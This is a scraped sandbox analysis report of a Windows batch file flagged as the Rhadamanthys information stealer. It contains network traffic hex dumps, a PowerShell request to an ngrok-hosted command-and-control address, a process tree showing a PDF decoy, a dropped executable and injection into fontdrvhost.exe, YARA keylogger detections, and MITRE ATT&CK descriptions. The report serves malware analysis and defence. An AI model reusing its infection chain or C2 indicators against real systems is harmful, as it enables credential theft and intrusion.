<Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,\|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rt
2024-12-17 11:14:22 UTC	1390	IN	Data Raw: b0 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4\|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
2024-12-17 11:14:22 UTC	1390	IN	Data Raw: d6 e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G\|?6:{r;iG
2024-12-17 11:14:22 UTC	1390	IN	Data Raw: d9 c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2024-12-17 11:14:22 UTC	1390	IN	Data Raw: 3b ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e Data Ascii: ;^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>
2024-12-17 11:14:22 UTC	1390	IN	Data Raw: 28 a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d Data Ascii: ( 1v=K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']
2024-12-17 11:14:22 UTC	1390	IN	Data Raw: 01 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F
2024-12-17 11:14:22 UTC	1390	IN	Data Raw: 3f 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e Data Ascii: ??AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN
2024-12-17 11:14:22 UTC	1390	IN	Data Raw: 4f 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 Data Ascii: ODsQNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:14:58 UTC	228	OUT	GET /metadata/a53f93d43005d4ee2fadb95063c82fef HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app Connection: Keep-Alive
2024-12-17 11:14:59 UTC	213	IN	HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Content-Length: 207 Content-Type: text/html; charset=utf-8 Date: Tue, 17 Dec 2024 11:14:59 GMT Server: Werkzeug/3.0.3 Python/3.12.8 Connection: close
2024-12-17 11:14:59 UTC	207	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Target ID:	0
Start time:	06:14:01
Start date:	17/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\122046760.bat" "
Imagebase:	0x7ff6a85a0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	06:14:11
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\a0df86d4-9e44-49c4-ab97-66c1270d73b1.pdf
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	06:14:13
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:3
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	8
Start time:	06:14:16
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6408 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:6
Imagebase:	0x800000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	10
Start time:	06:14:17
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	14
Start time:	06:14:20
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7756 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8
Imagebase:	0x7ff6de9c0000
File size:	1'255'976 bytes
MD5 hash:	76C58E5BABFE4ACF0308AA646FC0F416
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 122046760.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_a864b770-49d8-4cea-8103-d1cf1dac1b58\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D54.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DD2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E01.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\01f5bcf2-9e84-4b29-9d97-6b048654e665.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2709e4e1-18cf-49a0-b191-fa180fd6da6f.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4267d6ca-0564-4cbb-af54-22dddf37f9ed.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\65aaf9d5-cdec-4d18-b544-26e724912763.tmp

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\78874e95-ca53-48f3-920e-1e67e2391011.tmp

Windows Analysis Report
122046760.bat

Target ID:	18
Start time:	06:14:30
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	20
Start time:	06:14:38
Start date:	17/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Imagebase:	0x7ff67dcd0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	06:14:55
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe"
Imagebase:	0x400000
File size:	25'100'288 bytes
MD5 hash:	9BFDFAADE8C1612270DA2A69959756A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	23
Start time:	06:15:11
Start date:	17/12/2024
Path:	C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe"
Imagebase:	0x7ff72bec0000
File size:	25'100'288 bytes
MD5 hash:	9BFDFAADE8C1612270DA2A69959756A7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000017.00000003.2394734471.0000000002E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000017.00000002.2413715867.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.2401851669.0000000005460000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000003.2402695142.0000000005680000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	24
Start time:	06:15:13
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\fontdrvhost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\fontdrvhost.exe"
Imagebase:	0xc10000
File size:	676'584 bytes
MD5 hash:	8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000003.2403887025.0000000003120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.2409389529.0000000005410000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000018.00000003.2409670656.0000000005630000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000018.00000002.2509453717.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Target ID:	30
Start time:	06:15:23
Start date:	17/12/2024
Path:	C:\Windows\System32\fontdrvhost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\fontdrvhost.exe"
Imagebase:	0x7ff72c440000
File size:	827'408 bytes
MD5 hash:	BBCB897697B3442657C7D6E3EDDBD25F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	32
Start time:	06:15:26
Start date:	17/12/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 9172 -s 136
Imagebase:	0x7ff733480000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Execution Coverage:	33.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	83.3%
Total number of Nodes:	24
Total number of Limit Nodes:	0

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre